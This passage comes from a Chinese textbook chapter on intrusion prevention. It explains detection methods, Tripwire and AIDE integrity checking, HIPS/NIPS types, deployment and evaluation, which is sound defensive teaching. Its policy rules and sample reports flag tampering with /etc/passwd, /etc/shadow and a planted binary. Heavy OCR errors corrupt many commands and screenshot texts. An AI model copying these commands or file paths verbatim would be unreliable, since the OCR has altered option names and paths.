别 于 正常 行为 的 系统 API 序列 ,从 而 可 以 识别 人 侵 。 

(3) 数据 挖掘 : 数据 挖掘 技术 应 用 于 IPS 领域 ,主要 是 利用 其 中 的 关联 分 析 序列 模 
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式 分 析 和 聚 类 分 析 等 算法 ,用 这 些 算法 提取 有 关 的 行为 特征 ,生成 分 类 模型 ,从 而 可 自动 
识别 人 侵 。 例 如 ,遗传 算法 将 事件 定义 为 一 个 二 进 制 向 量 , 向 量 中 每 个 元 素 表示 某 种 攻 
击 , 向 量 的 值 按照 攻击 相关 程度 逐步 演化 ,每 轮 演 化 中 ,向 量 可 以 进行 变异 和 重新 测试 。 
神经 网 络 技术 也 用 于 IPS, 其 基本 思想 是 使 用 正常 行为 的 样本 训练 神经 网 络 ,然后 检测 偏 
离 这 些 样本 的 人 侵 模式 。 
异常 检测 可 以 检测 未 知 的 入侵 模式 ,缺点 是 行为 模式 往往 不 够 精确 ,导致 误 报 较 多 。 
当前 ,主流 IPS 要 以 误 用 检测 为 主 , 并 结合 异常 检测 ,从 而 综合 两 者 优点 。 实 际 上 ， 
反 病 毒 软件 采用 的 主动 防御 技术 就 是 借鉴 异常 检测 的 思想 ,对 于 未 知 病毒 ,如 果 发 现 其 有 
常 行为 (如 修改 注册 表 ) , 即 可 产生 报警 。 
3. 完整 性 分 析 
完整 性 分 析 主 要 关注 某 个 文件 或 对 象 是 否 被 更 改 , 如 某 个 Windows 注册 表 项 、 某 个 
文件 的 大 小 等 ,主要 用 于 发 现 代码 。 它 基于 哈 希 摘要 技术 ,可 以 识别 最 细微 的 变化 ， 
检测 是 否 发 现 入侵 行 为 ,只 要 入 侵 行为 导致 任何 对 象 的 改变 ,完整 性 
现 。 它 的 实现 方式 是 以 配置 文件 的 形式 对 要 监视 的 对 象 进行 预先 的 摘要 
计算 ,然后 定期 对 这 些 对 象 重新 计算 哈 希 摘要 值 并 比较 ,一 旦 发 现 某 个 摘要 值 有 差异 , 则 
可 断 :人 侵 。 它 无 法 实时 分 析 ,通常 用 于 事后 分 析 , 但 是 它 是 IPS 的 必要 补充 手段 ， 
在 前 两 种 检测 方法 无 法 发 现 人 侵 行 为 时 , 它 就 是 IPS 的 最 后 一 道 防线 。 
Windows Sysinternal 工具 集 的 sigcheck( 图 8-2) 就 可 以 用 来 生成 文件 的 各 种 常见 哈 
希 摘要 ,包括 MD5、SHA1 等 ,可 以 基于 该 工具 编写 脚本 ,针对 指定 文件 和 目录 进行 完整 
性 检测 。 



























国 C\Windows\system32\cmd.exe [ey x 











图 8-2 ”sigcheck 使 用 示例 





Tripwire 是 一 款 经 典 的 完整 性 分 析 工 具 , 可 以 用 它 建立 数据 完整 性 监测 系统 。 它 
不 能 抵御 攻击 也 不 能 防止 对 关键 文件 的 修改 ,但 是 它 可 以 检测 文件 是 否 被 修改 以 及 哪些 


四 ”https://sourceforge. net/projects/tripwire/ 。 
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文件 被 修改 。 在 Tripwire 被 安装 配置 后 ,立即 将 当前 的 系统 数据 状态 建立 成 数据 库 , 当 
系统 中 存在 文件 添加 、 删 除 和 修改 等 情况 时 ,比较 系统 现状 与 数据 库 中 的 状态 ,判定 哪些 
文件 被 添加 、 删 除 和 修改 过 。 通 常 ,应 该 在 服务 器 开放 之 前 ,或 者 操作 系统 刚 被 安装 后 , 立 
即使 用 Tripwire 构建 数据 完整 性 监测 系统 。 

Tripwire 对 要 求 校 验 的 文件 进行 哈 希 摘要 ,生成 唯一 的 标识 , 即 “快照 ”, 包 含 这 些 系 
统 文件 的 大 小 、inode、 权 限 、 时 间 等 众多 属性 。 当 某 个 属性 被 修改 后 , 如果 再 次 运行 
Tripwire, 它 会 生成 有 关 属 性 改变 的 详细 报告 ,安全 人 员 通 过 分 析 该 报告 即 可 发 现 可 能 的 
人 入侵。 表 8-1 给 出 了 Tripwire 的 主要 配置 文件 (文件 路 径 为 Ubuntul6. 04 系统 安装 
Tripwire 2. 4. 2 的 默认 路 径 ) 。 


表 8-1 Tripwire 的 有 关 配 置 文件 

定义 数据 库 、 策 略 文 件 和 Tripwire 可 执行 文件 的 存 
放 位 置 

安全 策略 的 定义 文件 ,定义 检测 的 对 象 及 违规 时 采 
取 的 行为 

/var/lib/tripwire/ $ (HOSTNAME). twd 存放 快照 数据 库 的 文件 名 称 

防止 自身 被 算 改 ,Tripwire 会 对 自身 进行 加 密 和 签 
名 处 理 ,site. key 用 于 保护 策略 文件 和 配置 文件 
/etc/tripwire/ $ (HOSTNAME)-local. key local 密 钥 用 于 保护 数据 库 和 分 析 报 告 


/var/lib/tripwire/report/ $ ( HOSTNAME )- local 密 钥 用 于 保护 数据 库 和 分 析 报告 
$DATE. twr 


/etc/tripwire/twcfg. txt 





/etc/tripwire/twpol. txt 








/etc/tripwire/site. key 











Tripwire 的 主要 应 用 流程 如 下 : 

OO 安装 时 生成 local. key 和 site. key, 或 使 用 *twadmin -m G” 生 成 密 钥 对 。 

@ 对 Tripwire 做 基本 设置 : 编辑 和 修改 /etc/tripwire/twcfg. txt”, 生 成 加 密 的 配 
置 文件 ,默认 是 “twcfg”。 


/usr/sbin/twadmin ——- create - cfgfile tw. cfg - S /etc/tripwire/site. key /etc/tripwire/ 
twcfg. txt 


@ 修改 安全 策略 : 编辑 “/etc/tripwire/twpol. txt”, 生成 加 密 的 策略 文件 ,默认 是 


tw. pol。 


/usr/sbin/twadmin ——- create - polfile tw. pol - S /etc/tripwire/site. key /etc/tripwire/ 
twpol. txt 


@ 初始 化 数据 库 。 

/usr/sbin/tripwire —— init // 需 要 花费 几 分 钟 时 间 建 立 数据 库 
Q@ 完整 性 检测 。 

/usr/sbin/tripwire -- check -- interactive  // 交 互 式 显示 检测 结果 

查看 报告 。 


/usr/sbin/twprint -- print ~ report -- twrfile /var/1ib/tripwire/report/ 报 告 名 .twr 


第 8 章 “入侵 防御 


Tripwire 的 使 用 和 维护 相对 比较 简单 ,关键 是 需要 依靠 管理 员 定 制 完整 的 策略 和 检 
查 周期 ,以 便 及 时 发 现 人 侵 。 图 8-3 和 图 8-4 分 别 给 出 Tripwire 和 Twadmin 程序 的 基本 
使 用 帮助 ,图 8-5 指明 Tripwire 可 检测 的 所 有 对 象 属性 。 图 8-6 从 twpol. txt 中 抽取 了 
两 条 基本 策略 ,图 8-7 给 出 了 Tripwire 相对 这 两 条 策略 的 基本 检测 结果 。 图 8-7(a) 说 
明 目 录 “/usr/bin”" 有 变化 ,发 现 一 个 新 文件 “/usr/bin/fakecp” ,很 有 可 能 是 木马 或 后 门 ; 
图 8-7(b) 说 明文 件 “/etc/passwd” 和 “/etc/shadow” 被 修改 过 ,很 有 可 能 系统 被 偷偷 添加 
过 账号 。 








tripwire { -m i 


tripwire { -m < 


tripwire { Er 
tripwire update-pottcy } [ op 


test } [ options 





图 8-3 Tripwire 命令 帮助 


Tripwir 


twadnin { -nF | --create-cfgfile } 
configfile, txt 
twadnin { -mf | --print-cfgfile } [ options... ] 
twadntn { -np | --create-polfile } [ options 
policyfile. txt 
twadnin { -mp | --print-polfile } [ options... ] 
twadnin { -mn R | --renove-encryption } [ op 
fttel [ file 
twadnin { -mE | --encrypt } [ 
fttel [ fttez... ] 
twadnin { -me | --examtne } [ 
filel [ 
twadnin { -m G | --generate-keys } opt 
twadnin { -mn C | --change-passphrases } 9 





图 8-4 Twadmin 的 命令 帮助 


Characters used tn property masks, with descrtpttons: 


Ignore the fotLowtng properttes 
Record and check the following properties 
Access ttmestanp 

Number of blocks allocated 

Inode tinestanp (create/modtfy) 

ID of device on which inode resides 

File owner's group ID 

Inode number 

File ts tncreastng tn stze (a "growing file") 
Modification tinestanp 

Number of links (tnode reference count) 
Permtsstons and file mode bits 

ID of devtce potnted to by tnode 

(vattd onty for devtce objects) 

File stze 

File type 

File owner's user ID 

CRC-32 hash value 

Haval hash value 

MDS hash value 

SHA hash value 


noaar-roanco+， 





mwzsrncrw 


图 8-5 Tripwire 检测 的 所 有 属性 
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本 Logtn and Privilege Ratstng prograns 
局 
( 


rulenane = "Security Control”, 
Severity = $(SIG_MED) 


/etc/passwd -> $(SEC_CONFIG) ; 
/etc/shadow -> $(SEC_CONFIG) ; 


Binaries 


rulenane = "Other btnartes"， 
Severity = $(SIG_MED) 


/usr/local/sbin -> $(SEC_BIN) 
/usr/tLocatibtn -> $(SEC_BIN) 
/usr/sbin -> $(SEC_BIN) 
/usr/bin -> $(SEC_BIN) 





图 8-6 两 条 安全 策略 示例 


Sectton: Untx Ftle System 


Rule Nane Severtty Level |added | Renoved [nodtried 
other btnartes 66 9 
otal objects scanned: 1999 


otal violattons found: 2 


bject Summar 
Sectton: Untx Ftle 


Rule Nane: other btnartes (/usr/btn) 
sy Level: 66 


dded 
usr/btn/fakecp， 


Wodtfted: 
DT 





(a) 


Rute Nane Severtty Level Added Renoved| nod{fted 
* Securtty Control 66 日 日 


Torat objects scanned: 
Total violattons found: 


object Sunnary 


# Sectton: Untx Ftle Systen 


Rute Nane: Securtty Control (/etc/pa 
Severity Level: 66 


Modtrted 
/etc/passwd" 


Rule Nane; Securtty Control (/ete/shadow) 
Severtty Level: 66 


CE 
"/etc/shadow" 





(b) 
图 8-7 Tripwire 针对 图 8-6 两 条 安全 策略 的 检测 结果 
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系统 通常 会 定期 执行 完整 性 分 析 工 具 , 如 Tripwire 默认 每 天 检测 一 次 ,在 /etc/ 
crontab/cron. daily 目录 下 有 Tripwire 的 执行 脚本 。 

与 Tripwire 类 似 的 工具 是 高 级 入 侵 检 测 环境 (Advanced Intrusion Detection 
Environment,AIDE)9, 主要 用 途 是 检测 文档 的 完整 性 。 它 的 配置 和 使 用 方法 与 
Tripwire 极其 类 似 , 可 以 作为 Tripwire 的 替代 和 扩展 软件 ,因为 Tripwire 已 经 成 为 商业 
软件 ,新 版 本 不 再 开源 。 

AIDE 命令 帮助 如 图 8-8 所 示 ,主要 有 4 条 命令 : 





oot@ubuntu: /home/fguo# aide --help 
Aide 0.16a2-19-g1i6ed855 


sage: atde [opttons] comnand 


‘ommands: 
Initialize the database 
Check the database 
Check and update the database non-interactively 
-compare Compare two databases 


tscellaneous: 

-D，--conftg-check Test the conftguratton ftte 
-version Show verston of AIDE and compilation opttons 
-help Show this help message 


pptions: 
-c [cfgfile] -- Get conftg opttons from [cfgftte] 
-B "OPTION”  -- Before configuration file is read define OPTION 


-A "OPTION” -- After conftguratton file ts read deftne OPTION 
-r [reporter] --report=[reporter] Write report output to [reporter] url 
-V[tevet] --verbose=[level] Set debug message level to [level] 





图 8-8 AIDE 命令 帮助 


(1) --init 根据 配置 文件 初始 化 数据 ,产生 数据 库 ,数据 库 文件 默认 是 */var/lib/aide/ 
aide. db”, 可 以 通过 /etc/aide/aide. conf 配置 文件 修改 。 

(2) --check 进行 完整 性 检测 ,可 以 设置 -r [reporter], 设 置信 息 输 出 位 置 ,默认 是 控 
制 台 。 

(3) --update 除 进行 完整 性 检测 外 ,还 将 当前 的 最 新 信息 生成 一 个 新 的 数据 库 文件 ， 
默认 位 置 是 “/var/lib/aide/aide. db. new”。 

(4) --compare 从 配置 文件 中 读 取 新 旧 数据 库 文件 的 位 置 并 进行 比较 ,结果 
到 控制 台 。 

图 8-9 给 出 配置 文件 的 部 分 片段 ,用 户 可 以 修改 两 个 新 旧 数 据 库 文件 的 默认 位 置 。 
图 8-10 一 图 8-12 分 别 示例 --check、--update 和 --compare 选项 的 输出 结果 ,检测 结果 表明 
目录 “/home/fguo” 被 修改 过 (m 表示 修改 时 间 ,c 表示 当前 时 间 ) ,文件 “/etc/passwd” 的 
内 容 有 变动 ,“C” 表 示 校 验 和 有 变化 。AIDE 需要 通过 “aide. conf” 文 件 定 制 安全 策略 , 同 
时 在 “/etc/cron. daily/” 目 录 下 存在 "aide” 脚 本 程序 ,每 天 定期 执行 完整 性 检查 。 


默认 输出 





® https://sourceforge. net/projects/aide/ 。 
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FAIDE co ER 


新 | 日数 据 库 的 位 置 





# Set to no to disable sunnarize_changes option. 
summarize_changes=yes 


# Set to no to disable grouping of files tn report. 
grouped=yes 


# standard verbose level 
verbose = 6 


# Set to yes to print the checksuns in the report tn hex format 
report_base16 = no 


# if you want to sacrifice security for speed, renove sone of these 
# checksuns. Whirlpool ts broken on sparc and sparc64 (see #429180, 


- 预定 义 的 尾 性 交 量 





hecksuns = Sha256+shaSi2+rmd160+haval+gost+crc32+t 


图 8-9 ”AIDE 配置 文件 示例 


root@ubuntu: /var/\ib/aides# userdel, testtw 
root@ubuntu: /var /1tb/aide#[atde --check -C Tetc7atde7atde conF -V4] 检测 系统 变化 
AIDE 6.16a2-19-916ed855 found dtfTerences Detween database and FULlesysten!! 
Start tinestanp: 2017-06-18 21:44:15 -9769 

Verbose level: 4 


sumnary: 
Total number of entrtes: 
Added entrtes: 
Removed entries 
Changed entries 


Changed entrie 


letc/passwd 
/hone/fguo 


The attrtbutes of the (unconpressed) database(s 


/var/\b/aide/atde.db 
RMD160 。 : DUNM6MHNAL4gq2XS88mLGRmkAT: 
TIGER ~ : KeDms7UsejavMu2qnoUY2sdVgYNJXzV7 
SHA256 =: NESXIcbnRqUQxgjmj4GzdtI6/nSrLdtz 

bk4tnsX2/+Y= 





图 8-10 AIDE 完整 性 检查 示例 


oot@ubuntu: /var /lib/aide# latde --update -c /etc/atde/atde.conf -V4 

IDE 6.16a2-19-gl6ed855 found differences between database and Fllesysten!! 
ew AIDE database written to /var/lib/aide/aide.db.new 

Btart tinestanp: 2017-06-18 21:45:32 -0760 

erbose level: 4 


Total number of entries: 
Added entries: 

Removed entries 

Changed entries: 


hanged entries 


/etc/passwd 
/hone/fguo 


he attributes of the (uncompressed) database(s) 


var/\ib/aide/aide.db 

RMD160 DUNM6MHNAL4gq2XS88mLGRMkNT! 

TIGER KeDm57UsejavNu2qnoUY2sdVgYNIXzV7 

SHA256 。 : NESXIcbnRquQxgjmj4GzdtI6/nSrLdtz 
bk4tnsX21+Y= 

SHA512  : d]JRxnFNZwYBSFh9hT8g7R6IXNkJoHJnY 





图 8-11 AIDE 生成 新 数据 库 示 例 
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root@ubuntu: /var /lib/aides [aide --conpare -C_7etc1atde1atde-ConF -V7 


AIDE 0.16a2-19-gi6ed855 found differences between the two databasesi! 
start timestanp: 2617-66-18 21:46:67 -6766 
Verbose level: 2 


Sunnary: 
Total number of entries: 2 
Added entrtes: 两 个 数据 库 文件 的 差异 
Removed entries: 
Changed entries: 


nc C /etc/passwd 
nc : /home/fguo 


The attributes of the (uncompressed) database(s 


/var/lib/aide/aide.db 
: DUNM6MHNAL4gq2X5S88mLGRmknTg= 
TIGER : KeDm57UsejavWu2qnoUY2sdVgYNJXzV7 
SHA256 。 : NESXIcbnRqUQxgjmj4GzdtI6/nSrLdtz 
+Y= 





图 8-12 AIDE 比较 新 旧 数 据 库 示例 


8.1.3 IPS 分 类 


按照 数据 来 源 方式 划分 ,IPS 分 为 基于 主机 的 IPS(Host-based IPS, HIPS) 和 基于 网 
络 的 IPS(Network-based IPS,NIPS) 两 种 。 

HIPS 主要 用 于 保护 主机 不 受 网 络 攻击 的 危害 ,通过 监视 与 分 析 主 机 的 审计 日 志文 
件 检测 人 侵 , 日 志 会 实时 记录 攻击 过 程 中 的 行为 痕迹 ,HIPS 通过 制定 相应 的 安全 规则 可 
以 实时 发 现 人 侵 行 为 ,并 快速 启动 响应 。HIPS 的 关键 在 于 日 志 能 否 实 时 记录 以 及 HIPS 
能 够 及 时 从 日 志 中 提取 可 疑 行为 痕迹 ,因为 攻击 者 往往 余 日 志 中 的 痕迹 。 它 的 优点 是 
可 精确 判断 入 侵 事件 ,不 受 网 络 加 密 的 影响 ; 缺点 是 会 占据 主机 宝贵 的 CPU 和 内 存 资源 。 

HIPS 主要 监视 网 络 连接 ,主机 文件 .系统 进程 等 对 象 ,因此 针对 不 同 的 操作 系统 需 
要 实现 不 同 的 HIPS。 

(1) 网 络 连接 检测 是 对 试图 进入 主机 的 报 文 进行 检测 ,可 以 在 攻击 报 文 进入 主机 之 
前 检测 到 入 侵 行为 。 例 如 ,HIPS 监测 到 有 报 文 试图 对 未 开放 的 端口 发 起 连接 ,说 明 很 可 
能 在 发 生 网 络 扫描 ,HIPS 即 可 记录 此 类 事件 。 

(2) 主机 文件 检测 指 监视 系统 日 志 、 程 序 日 志 、 文 件 系统 等 可 能 记录 攻击 行为 痕迹 的 
地 方 ,以 发 现 人 侵 行为 。 例 如 ,文件 系统 中 可 能 存在 某 些 非 正常 创建 的 文件 或 目录 , 则 有 理 
由 怀疑 可 能 受到 入 侵 ; 又 如 ,日 志文 件 中 存在 异常 记录 , 则 可 以 认为 正在 或 已 经 发 生 入 侵 。 

(3) 系统 进程 检测 指 某 个 进程 如 果 存 在 不 符合 安全 策略 的 异常 行为 , 则 可 能 发 生 入 
侵 。 例 如 ,偷偷 修改 注册 表 信 息 、 在 后 台 增加 系统 用 户 等 ,都 属于 可 疑 信 侵 行为 。 

NIPS 通常 作为 独立 设备 放 在 受 保护 的 网 络 中 ,使 用 网 络 报 文 作为 数据 分 析 的 事件 
来 源 , 利 用 高 速 网 卡 监视 通过 受 保 护 网 络 传输 的 所 有 信息 。 当 检测 到 可 疑 人 侵 时 ,可 以 采 
用 中 断 连接 、 隔 离 IP 和 报警 等 方式 做 出 响应 。 

NIPS 可 以 监听 某 个 具体 的 主机 通信 ,也 可 以 监听 整个 网 段 。 监 听 网 段 时 ,NIPS 需 
要 把 自身 网 卡 设置 为 混杂 模式 以 收集 网 段 内 所 有 报 文 。 目 前 主流 的 NIPS 都 是 采用 特征 
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检测 为 主 . 异 常 检测 为 辅 的 分 析 方 式 , 从 报 文中 提取 有 关 信 息 与 特征 匹配 或 者 与 预定 义 行 
为 模型 比较 ,以 识别 攻击 事件 。NIPS 可 以 是 软件 实现 如 开源 软件 Snort 和 Bro, 也 可 以 
是 独立 硬件 实现 。 通 常 商业 NIPS 都 采用 硬件 实现 ,因为 需要 满足 用 户 苛刻 的 性 能 要 求 。 
NIPS 对 主机 资源 消耗 较 少 ,可 以 提供 对 整个 网 络 的 保护 ,而 无 须 考虑 不 同 主机 和 不 
同 操作 系统 的 异 构 性 ,但 是 其 检测 的 精确 度 不 如 HIPS。 
IPS 部 署 时 常常 将 HIPS 和 NIPS 有 机 结合 ,采用 分 布 式 架构 ,在 获得 来 自 不 同 IPS 
的 事件 后 ,通过 事件 关联 分 析 ,提高 检测 的 准确 度 和 实时 性 。 


8.1.4 1IPS 部 署 和 评估 


IPS 部 署 时 通常 根据 安全 需求 和 信息 来 源 决定 IPS 的 体系 结构 ,可 在 网 络 的 不 同位 
置 部 署 , 通 常 分 为 集中 式 和 分 布 式 结构 。 

集中 式 结构 常用 于 小 型 网 络 , 即 IPS 的 数据 分 析 和 结果 响应 由 单一 主机 完成 ,信息 收 
集 功能 可 以 分 布 在 不 同 的 主机 和 网 络 ,也 可 以 在 单一 主机 ,如 图 8-13 所 示 。 这 种 结构 的 
优点 是 将 所 有 数据 集中 分 析 , 结 果 较 为 准确 。 缺 点 主要 有 两 个 : 该 主机 如 果 失 效 则 整 
个 网 络 失去 保护 ; @ 该 主机 容易 成 为 IPS 的 性 能 瓶颈 ,因为 所 有 的 分 析 工 作 都 集中 在 该 
台 主 机 完成 。 











数据 采集 和 分 析 
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(a) (b) 
图 8-13 集中 式 IPS 的 两 种 架构 









































分 布 式 结构 采用 多 个 代理 在 网 络 各 个 部 分 收集 数据 ,并 协同 处 理 可 能 的 入 侵 行为 ,如 
图 8-14 所 示 。 将 不 同 的 代理 分 层 ,最 底层 的 代理 负责 收集 基本 信息 ,只 进行 简单 处 理 和 
判断 ,特点 是 处 理 数据 量 大 、 速 度 快 ,效率 高 。 中 间 层 代理 一 方面 可 以 接收 并 处 理 下 层 节 
点 提交 的 数据 , 另 一 方面 可 以 进行 较 高 层次 的 关联 分 析 、 判 断 和 输出 结果 ,并 向 高 层 节点 

报告 ,减轻 高 层 节 点 负担 ,增强 系统 伸缩 性 。 最 高 层 节 点 主要 负责 对 各 级 节点 协调 和 管 

理 , 也 可 以 动态 调整 节点 的 层次 关系 图 ,实现 动态 配置 。 

HIPS 通常 安装 在 被 重点 监测 的 关键 主机 ,对 该 主机 的 网 络 连 接 、 系 统 和 程序 日 志 、 
命令 运行 结果 等 进行 智能 分 析 和 判断 。 

NIDS 根据 不 同安 全 需求 可 能 部 署 在 多 个 不 同位 置 ,一 般 位 于 如 下 位 置 ( 图 8-15): 

(1) 外 网 入 口 : 位 于 防火 墙 之 前 ,可 以 监控 进出 防火 墙 外 网 口 的 所 有 报 文 。NIPS 可 
以 检测 外 部 攻击 行为 ,包括 对 内 部 服务 的 攻击 、 对 防火 墙 的 攻击 以 及 对 内 部 主机 的 攻击 。 

(2) DMZ 区 : 监控 对 DMZ 区 服务 器 的 攻击 ,因为 DMZ 区 仅 提 供 少数 几 种 服务 ， 
NIPS 更 容易 发 挥 优势 。 
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图 8-14 分 布 式 IPS 的 架构 


HIPS NIPS 
重要 主机 关键 子 网 









外 部 入 口 


DMZ 网 络 





HIPS NIPS 
重要 主机 关键 子 网 


图 8-15 IPS 的 部 署 位 置 示意 图 


(3) 内 部 主干 网 络 : 监视 内 部 网 络 发 出 的 报 文 、 外 部 发 出 且 经 过 防火 墙 过 滤 后 的 报 
文 ,NIPS 还 可 以 检测 躲避 防火 墙 的 攻击 以 及 内 部 向 外 发 出 的 异常 报 文 。 

(4) 关键 子 网 : 监视 内 部 网 络 中 需要 重点 保护 的 子 网 ,如 财务 部 门 、 人 事 部 门 等 ， 
NIPS 检测 向 这 些 子 网 发 起 的 攻击 ,保护 关键 子 网 没有 被 非法 入 侵 。 

虽然 IPS 已 经 是 网 络 安全 体系 的 重要 组 成 部 分 ,但 IPS 在 完备 性 、 灵 活性 和 协作 能 力 
方面 还 存在 严重 不 足 , 通 常 衡量 IPS 的 性 能 指标 主要 有 以 下 几 个 方面 : 

(1) 查 全 率 : 检测 的 真实 入 侵 行为 与 所 有 实际 真实 入 侵 数 目的 比值 。 

(2) 查 准 率 : 检测 的 真实 入 侵 行为 与 实际 报警 的 入 侵 行 为 数目 的 比值 。 

(3) 误 报 率 : 检测 的 入 侵 行为 中 虚假 报警 的 比例 。 

(4) 抗 攻击 能 力 : 包括 自身 的 安全 漏洞 和 单位 时 间 能 够 处 理事 件 的 数量 ,IPS 可 能 会 
被 大 量 正常 事件 洽 没 自己 的 缓存 ,从 而 丢弃 后 续 事 件 , 无 法 识别 真实 入 侵 ; 另外 ,各 个 模 
块 之 间 的 通信 也 可 能 被 破坏 和 假冒 ,使 得 检测 结果 失真 。 

(5) 实时 性 : 从 和 人 侵 发 生 到 产生 报警 和 响应 之 间 的 延迟 时 间 长 短 。 

(6) 功 耗 : IPS 的 硬件 资源 占用 情况 ,平均 负荷 能 力 , 即 在 不 同 的 网 络 流量 下 和 不 同 
的 CPU 使 用 情况 下 ,对 查 全 率 、 查 准 率 和 误 报 率 等 关键 指标 的 影响 。 

(7) 日 志 分 析 : IPS 保存 日 志 的 能 力 和 读 取 日 志 内 容 的 能 力 。 
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8.1.5 发 展 方向 


IPS 作为 积极 主动 的 防护 技术 ,在 系统 受到 入 侵 之 前 检测 并 阻止 入 侵 , 但 是 目前 主流 
的 IPS 系统 都 存在 不 少 问题 : 

(1) 虚 警 过 多 。 预 先 提取 的 特征 或 模型 不 够 精确 ,导致 IPS 对 正常 行为 也 会 产生 大 
量 虚假 报警 ,攻击 者 真正 的 入 侵 行 为 被 隐藏 在 大 量 的 虚假 报警 中 ,使 得 发 现 真 正 的 入 侵 非 
常 困难 。 

(2) IPS 自身 抗 攻 击 能 力 差 。 当 前 IPS 的 规则 集合 越 来 越 庞大 ,过 多 地 追踪 和 分 析 
网 络 报 文 ,提升 IPS 的 智能 分 析 水 平 ,但 同时 削弱 了 IPS 的 处 理性 能 ,降低 了 IPS 系统 的 
自身 健壮 性 ,可 能 招致 DoS 攻击 。 

(3) 缺乏 检测 复杂 攻击 的 手段 。 例 如 ,异常 检测 需要 设置 阔 值 ,但 是 攻击 者 可 以 将 攻 
击 的 速度 和 频率 控制 在 阔 值 内 ,就 不 会 触发 IPS 报警 ,从 而 绕 过 IPS。 

(4) 难以 发 现 未 知 攻击 。 随 着 攻击 技术 更 新 频繁 ,已 有 的 特征 检测 手段 容易 被 绕 过 ， 
而 IPS 很 难 及 时 跟踪 最 新 的 攻击 技术 。 

(5) 加 密 信息 难以 检测 。IPS 通常 假设 攻击 信息 明文 传输 ,因此 加 密 的 恶意 信息 可 
以 轻松 逃避 检测 。 

(6) 缺乏 统一 标准 。 各 IPS 产品 供应 商 缺 乏 统一 的 行业 标准 ,使 得 不 同 产品 互通 协 
作 十 分 困难 。 

当前 ,IPS 技术 的 主要 发 展 方向 有 以 下 几 个 方面 : 

(1) 分 布 式 检测 。 针 对 分 布 式 网 络 攻 击 的 检测 和 防御 ,以 及 使 用 分 布 式 协同 方法 进 
行 检测 ,主要 是 根据 不 同 的 信息 来 源 进行 关联 和 协同 分 析 , 检 测 出 复杂 的 攻击 场景 。 例 
如 ,关联 分 析 不 同 HIPS 和 NIPS 产生 的 事件 和 报警 ,识别 多 阶段 攻击 的 复杂 场景 。 

(2) 与 操作 系统 融合 。 将 HIPS 作为 操作 系统 的 一 部 分 ,每 当 用 户 在 访问 系统 资源 
时 ,需要 获得 授权 或 认证 ,然后 所 有 的 访问 操作 被 忠实 记录 进 日 志文 件 ,同时 日 志文 件 的 
修改 也 需要 获得 授权 ,这 样 可 以 有 效 防止 攻击 者 的 非法 访问 。 

(3) 与 其 他 设备 集成 。 与 防火 墙 \VPN、 反 病毒 网 关 等 技术 相 结合 ,集成 进 网 络 转发 
设备 , 称 为 统一 威胁 管理 (Unified Threat Management,UTM) ,将 多 种 安全 特性 集成 于 
一 个 硬件 设备 ,构成 一 个 标准 的 统一 管理 平台 。 

(4) 提高 自身 安全 性 。 一 旦 IPS 被 攻击 者 控制 或 者 DoS 攻击 ,系统 则 失去 保护 屏障 ， 
因此 如 何 防止 攻击 者 对 IPS 的 破坏 .入 侵 和 躲避 是 IPS 的 长 期 研究 课题 。 

(5) IPS 的 评测 方法 。 如 何 评价 一 个 IPS 的 优 劣 ,评价 指标 包括 IPS 的 检测 精确 度 、 
IPS 的 功 耗 和 自身 可 靠 性 。 设 计 通 用 的 IPS 评估 方法 .实现 对 多 种 不 同 IPS 的 检测 和 分 
析 , 也 是 IPS 的 另 一 个 重要 研究 方向 。 


8.2 基于 主机 的 IPS 


基于 主机 的 IPS(HIPS) 对 所 有 进入 主机 的 信息 进行 检测 、 对 所 有 和 主机 建立 的 TCP 
连接 进行 监控 .对 所 有 发 生 在 主机 上 的 操作 进行 管制 , 它 具 有 如 下 功能 : 
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(1) 抵御 恶意 代码 攻击 。 抵 御 恶 意 代 码 攻击 分 为 两 部 分 ,一 是 从 网 络 接口 获得 的 数 
据 中 识别 恶意 代码 特征 ,发 现 可 能 的 攻击 行为 ,这 部 分 功能 与 反 病毒 软件 类 似 ; 二 是 监测 
代码 执行 的 操作 ,判定 操作 是 否 合理 ,例如 某 个 程序 运行 时 如 果 企 图 占用 其 他 进程 的 内 存 
空间 ,就 有 理由 怀疑 该 程序 可 能 存在 缓冲 区 溢出 攻击 代码 ,此 时 HIPS 可 以 立即 终止 进程 
执行 或 者 通知 用 户 。 

(2) 监测 网 络 通 信 。HIPS 可 以 对 TCP 连接 的 合法 性 进行 监控 ,也 可 以 对 这 些 连接 
传输 的 信息 进行 监控 ,如 果 发 现 传输 的 信息 违背 了 预定 义 的 安全 策略 ,就 有 理由 怀疑 这 是 
网 络 后 门 的 秘密 通道 ,HIPS 可 以 立即 释放 该 连接 并 记录 与 该 连接 有 关 的 进程 信息 。 

(3) 保护 主机 资源 。 主 机 资源 包括 内 存 、 进 程 、 网 络 连接 和 文件 系统 等 ,HIPS 为 这 些 
资源 建立 访问 控制 列表 (ACL) ,指定 每 个 用 户 和 进程 允许 访问 的 资源 ,根据 ACL 严格 检 
测 主机 资源 的 访问 过 程 。 

HIPS 的 目的 是 防止 攻击 者 对 主机 资源 的 非法 访问 ,因此 必须 具有 监测 所 有 操作 的 
能 力 。 图 8-16 给 出 了 主机 IPS 的 工作 流程 。 

Q@ 截获 所 有 对 主机 资源 的 操作 请 求 ,如 调用 进程 . 读 写 文件 和 读 写 注 册 表 等 ; 

@ 确定 操作 对 象 类 型 和 操作 的 参数 信息 ; 

@ 结合 当前 系统 状态 和 访问 控制 策略 做 出 判定 ; 

@ 执行 决策 (可 以 通知 用 户 , 由 用 户 决定 是 否 人 允许 进 程 继续 执行 有 关 操作 ) 。 
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图 8-16 ”HIPS 的 工作 流程 











1. 操作 截获 

恶意 代码 非法 访问 主机 资源 通常 调用 操作 系统 内 核 的 文件 系统 、 内 存 管 理 系统 或 
I/O 系统 等 功能 接口 来 实现 ,因此 HIPS 必须 能 够 拦截 所 有 的 系统 调用 并 且 对 请 求 合 法 
性 进行 检测 。 同 时 ,由 于 入 侵 是 通过 网 络 实现 ,因此 IPS 也 必须 能 够 拦截 所 有 进出 主机 的 
信息 流 并 且 进 行 检测 。 

操作 截获 机 制 通常 有 三 种 方式 , 即 修 改 系统 内 核 ( 图 8-17 (a))、 系 统 调用 钧 子 
(图 8-17(b))、 网 络 信息 流 监 测 器 (图 8-17(c)) 。 操 作 系统 内 核 直 接 负责 对 主机 资源 的 操 
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作 , 由 操作 系统 内 核实 施 IPS 功能 是 最 彻底 的 保护 机 制 。 内 核 收 到 操作 请 求 后 ,根据 操作 
信息 和 ACL 列表 确定 是 否 属于 正常 访问 ,HIPS 的 发 展 方向 之 一 就 是 将 HIPS 变 为 内 核 
